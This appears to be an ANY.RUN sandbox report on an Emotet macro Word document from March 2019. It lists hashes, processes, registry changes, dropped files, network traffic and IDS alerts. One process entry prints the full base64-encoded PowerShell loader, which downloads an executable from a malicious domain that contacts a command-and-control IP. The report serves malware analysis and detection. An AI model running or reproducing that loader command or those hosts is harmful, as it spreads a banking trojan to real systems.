analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
download:

ny9rr-d21r9s-moxqao

Full analysis: https://app.any.run/tasks/a54ea2ac-7cf4-4bdb-ac96-bd23724a5cac
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: March 14, 2019, 14:51:43
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
loader
emotet
trojan
feodo
emotet-doc
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu Mar 14 14:23:00 2019, Last Saved Time/Date: Thu Mar 14 14:23:00 2019, Number of Pages: 1, Number of Words: 2, Number of Characters: 13, Security: 0
MD5:

1AB8BA9F72B0C97A794FB43542862F6B

SHA1:

542B8822F63E1BE5CB4B473D69FBCE22A051EB62

SHA256:

5F5A00ED2F6F8E405A0800E7D34AC7FEC27A2019E2385AE4DC25D9E59F36840D

SSDEEP:

6144:o77HUUUUUUUUUUUUUUUUUUUT52Vz/8mReBU7sFD0ZKL+eft20L:o77HUUUUUUUUUUUUUUUUUUUTCDReBU7+

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • 272.exe (PID: 4072)
      • 272.exe (PID: 3192)
      • wabmetagen.exe (PID: 2444)
      • wabmetagen.exe (PID: 3136)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 2828)
    • Emotet process was detected

      • wabmetagen.exe (PID: 2444)
    • EMOTET was detected

      • wabmetagen.exe (PID: 3136)
    • Connects to CnC server

      • wabmetagen.exe (PID: 3136)
    • Changes the autorun value in the registry

      • wabmetagen.exe (PID: 3136)
  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 2828)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 2828)
      • 272.exe (PID: 3192)
    • Application launched itself

      • 272.exe (PID: 4072)
      • wabmetagen.exe (PID: 2444)
    • Starts itself from another location

      • 272.exe (PID: 3192)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2712)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2712)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserType: Microsoft Word 97-2003 Document
CompObjUserTypeLen: 32
HeadingPairs:
  • Title
  • 1
TitleOfParts: -
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
CharCountWithSpaces: 14
Paragraphs: 1
Lines: 1
Company: -
CodePage: Windows Latin 1 (Western European)
Security: None
Characters: 13
Words: 2
Pages: 1
ModifyDate: 2019:03:14 14:23:00
CreateDate: 2019:03:14 14:23:00
TotalEditTime: -
Software: Microsoft Office Word
RevisionNumber: 1
LastModifiedBy: -
Template: Normal.dotm
Comments: -
Keywords: -
Author: -
Subject: -
Title: -
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
38
Monitored processes
6
Malicious processes
5
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start drop and start winword.exe no specs powershell.exe 272.exe no specs 272.exe #EMOTET wabmetagen.exe no specs #EMOTET wabmetagen.exe

Process information

PID
CMD
Path
Indicators
Parent process
2712"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\ny9rr-d21r9s-moxqao.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2828powershell -e KAAgAE4AZQB3AC0ATwBiAEoAZQBjAHQAIABJAG8ALgBjAG8AbQBwAHIARQBTAFMASQBvAE4ALgBEAEUARgBMAEEAVABlAHMAdABSAGUAQQBNACgAIABbAEkATwAuAG0ARQBtAG8AUgB5AHMAVAByAGUAQQBNAF0AIABbAHMAWQBzAHQAZQBNAC4AYwBvAG4AVgBFAFIAVABdADoAOgBGAHIAbwBtAEIAQQBzAGUANgA0AFMAdABSAEkAbgBHACgAIAAoACcAWABaAEoAJwArACcAUgBhADkAcwB3ACcAKwAnAEYASQBYACcAKwAnAC8AJwArACcAaQBoADQATQBTAHMAaABpAE4AOAAnACsAJwBWAGoAVQAnACsAJwBHAFAAJwArACcAbwBqAGIAJwArACcAVQBaACcAKwAnAHQANgB6ACcAKwAnAEQAcgBHACcAKwAnAGEAYgBHAFEAJwArACcAUgAnACsAJwBiACcAKwAnAHYAYgBGACcAKwAnAFYAJwArACcAMgA1ACcAKwAnAEsAUgBsAGQAaAB0ACcAKwAnAHkASAArAGYAMQBpACcAKwAnAFcAaABUAEkAKwBYAGoAMwBQAE8AUABWAGYAJwArACcATwBMAHoAOQBqAEUANABTAFUAcAB5AHcASABSACcAKwAnAGcATwBIAEEAWQBNADEAaABCAEwASABwAFMAJwArACcAcQBmAGsAUgB2AHkAZwBNACcAKwAnAGIAJwArACcAOQBnACcAKwAnAFcAWAAnACsAJwBVAEMAcABRAG0AYwBEADQAcgBBAEcAQgBwACcAKwAnAFMARwB0AGoAJwArACcAKwBoACcAKwAnAHYAUABNAHoAJwArACcAcwB0AGgAYQB5AEcAJwArACcASABwAEgAWABMAGwAJwArACcAZQBkAHAAegB2AGYAMQB4ADkAJwArACcAZgB2ACcAKwAnAGQAMQBRAGUAYgBjAG4ANgAnACsAJwByACcAKwAnAFgAUQBSACcAKwAnAFMAawBLAEsAYgBCAEMAcABTACcAKwAnAHQAMAAnACsAJwBlAFYAbQA0AGYAZQB1AEoAcgBxAGgAJwArACcAdwA4AE8ANABlAEwAJwArACcAdQBSACcAKwAnAGcAOQAnACsAJwBLADYAJwArACcAcQAnACsAJwBXAGkAJwArACcAdgBKAE4AUgBaACcAKwAnAEcANwBQAEYATgBkAE8AeQAnACsAJwBYAFgARQAnACsAJwBsAGoASQAnACsAJwAzAGgAZgAnACsAJwByACsANwAvACcAKwAnADAAJwArACcAWQBQACcAKwAnAEYAOQAyAGkAZAAnACsAJwB0ACcAKwAnAFMAJwArACcAaAAnACsAJwBjACcAKwAnADgAZgBTAGUAZQBmAHgAMgBFAGQAUgAnACsAJwBxACcAKwAnAEcAJwArACcAQQBxAGgAOABlAFYATgA1ADIAJwArACcAUgAnACsAJwBZAGIAegAnACsAJwAzAHEAJwArACcAZgB1ADkAYgBZACcAKwAnAFcAYgAnACsAJwAwAGwAcwA0ACcAKwAnAEQAQgAyAEQAVAByAEoAbwA4AHAAQgAnACsAJwBIADcAdQAxADkAdQBxACsAZwAyAGsAJwArACcASABNACcAKwAnAEEARQAnACsAJwBoAEoAJwArACcANgAvAGUAbgBhAEQAcAAnACsAJwBJADAANQBSAEMAJwArACcASAB0AEoAdwBnACcAKwAnAFoAdAAnACsAJwBEAFkAeQBSADEATQBMAEYAcgBEAEsAbgAnACsAJwBSAFEANwBtADkAMgBBACsAcAAnACsAJwBlAHEANgAxAG8AYwAnACsAJwBVAEYALwAwADgAVgAnACsAJwBaAFkAVQAnACsAJwBGAGQAJwArACcAbgBKAEEARwBXADIAVQAzACcAKwAnADQAdgBYAE0AUwBWACcAKwAnAGYAYwBsAGsAeQBFAEoATwBjACcAKwAnADYANQB3AGUAJwArACcAagBYACcAKwAnAHcAJwArACcANgBuACcAKwAnADkAbAAyACcAKwAnAG0AJwArACcAUgAnACsAJwB0AG0AcQA0AHUAbQBMAFYAVAAnACsAJwByACcAKwAnAFQASAA4AGoARgB6ACcAKwAnAGMAJwArACcAWgBOAGYAcQA2ACcAKwAnAGgAaQBUAE0AZQAwAHYAcwB4ADgAOABjAEkAVQBoACcAKwAnAG8AawBXAHoAJwArACcASwBiAHgAJwArACcAVwBpAFcAaQBjACcAKwAnAEgAdQBIAGUAMgAyAEsAQwB0AFQAawAyAFcARgAnACsAJwB4AEwAKwB5AGIAMAA0AE8AaQBkAHkAcgBCAHYAJwArACcAOAAnACsAJwBqADcAZgBYAGoAVABaAFoARwAnACsAJwBJAFgAMwAnACsAJwBrAFUAMgBaADcAcwBCACsAaQAnACsAJwB0ACcAKwAnAEoARwBiADQASABqAGsAaAAnACsAJwBlACcAKwAnAEgAMQA0AFgAJwArACcAaAAwACcAKwAnAEkAcwBZAG0AJwArACcAUAAnACsAJwA4ACcAKwAnADUAJwArACcAWQBTAEoAOABCAHMAagB5AHoAeABuACcAKwAnADgAJwArACcAQQAnACkAIAApACAALAAgAFsAUwB5AFMAdABFAG0ALgBJAG8ALgBjAG8AbQBQAHIAZQBzAHMAaQBPAE4ALgBDAG8ATQBQAFIAZQBTAHMAaQBvAE4ATQBvAEQARQBdADoAOgBEAEUAQwBPAG0AUAByAEUAcwBTACkAfAAgACUAewAgAE4AZQB3AC0ATwBiAEoAZQBjAHQAIAAgAGkATwAuAHMAdABSAGUAQQBtAFIARQBBAEQARQBSACgAJABfACAALAAgAFsAVABlAFgAdAAuAEUAbgBDAG8ARABpAG4AZwBdADoAOgBBAFMAYwBJAEkAIAApAH0AfAAgACUAIAB7ACAAJABfAC4AUgBFAGEARABUAE8AZQBuAEQAKAAgACkAfQAgACkAfAAgAGkATgBWAE8AawBFAC0ARQBYAHAAUgBFAFMAUwBpAG8AbgA=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
4072"C:\Users\admin\272.exe" C:\Users\admin\272.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Sticky Notes
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3192"C:\Users\admin\272.exe"C:\Users\admin\272.exe
272.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Sticky Notes
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2444"C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe"C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe
272.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Sticky Notes
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3136"C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe"C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe
wabmetagen.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Sticky Notes
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 673
Read events
1 258
Write events
410
Delete events
5

Modification events

(PID) Process:(2712) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:writeName:l"$
Value:
6C222400980A0000010000000000000000000000
(PID) Process:(2712) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1033
Value:
Off
(PID) Process:(2712) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1033
Value:
On
(PID) Process:(2712) WINWORD.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation:writeName:WORDFiles
Value:
1315831838
(PID) Process:(2712) WINWORD.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation:writeName:ProductFiles
Value:
1315831952
(PID) Process:(2712) WINWORD.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation:writeName:ProductFiles
Value:
1315831953
(PID) Process:(2712) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
Operation:writeName:MTTT
Value:
980A0000A263147E75DAD40100000000
(PID) Process:(2712) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:writeName:s#$
Value:
73232400980A000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000
(PID) Process:(2712) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:delete valueName:s#$
Value:
73232400980A000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000
(PID) Process:(2712) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
0
Executable files
2
Suspicious files
2
Text files
0
Unknown types
2

Dropped files

PID
Process
Filename
Type
2712WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR866C.tmp.cvr
MD5:
SHA256:
2828powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\9XIMVL9ZOZFWNIE7FETQ.temp
MD5:
SHA256:
2712WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:F9A0F18EACC74B893F429636D21B21D3
SHA256:056B2143329E6BFAF0ECE21ECFCC0A9F53D0463E3837E8848A3217CF08522688
2828powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:901ECDF767744E6BB59CB023757886E3
SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1
2828powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF1992a1.TMPbinary
MD5:901ECDF767744E6BB59CB023757886E3
SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1
2712WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$9rr-d21r9s-moxqao.docpgc
MD5:9E4B85E8ACACD44D966E520B0487D057
SHA256:E78FFBCC7FE018AD9B4FC06DB7A539A18E8DB2B324327B12681C05D91B379A83
2828powershell.exeC:\Users\admin\272.exeexecutable
MD5:722AFA30BFDC31768F7F8DE14A5C4F01
SHA256:7F48CBC0A3E02E6B3E02ADD99B9F5C18015441DA29AA8DC16B51F6D6CDCEAF76
3192272.exeC:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exeexecutable
MD5:722AFA30BFDC31768F7F8DE14A5C4F01
SHA256:7F48CBC0A3E02E6B3E02ADD99B9F5C18015441DA29AA8DC16B51F6D6CDCEAF76
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
2
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2828
powershell.exe
GET
200
178.128.41.189:80
http://turningspeech.com/rm44r5z/usg/
GR
executable
355 Kb
suspicious
3136
wabmetagen.exe
GET
200
187.233.152.78:443
http://187.233.152.78:443/
MX
binary
132 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3136
wabmetagen.exe
187.233.152.78:443
Uninet S.A. de C.V.
MX
malicious
2828
powershell.exe
178.128.41.189:80
turningspeech.com
Forthnet
GR
suspicious

DNS requests

Domain
IP
Reputation
turningspeech.com
  • 178.128.41.189
suspicious

Threats

PID
Process
Class
Message
2828
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
2828
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
2828
powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
2828
powershell.exe
Misc activity
ET INFO EXE IsDebuggerPresent (Used in Malware Anti-Debugging)
3136
wabmetagen.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo HTTP request
1 ETPRO signatures available at the full report
No debug info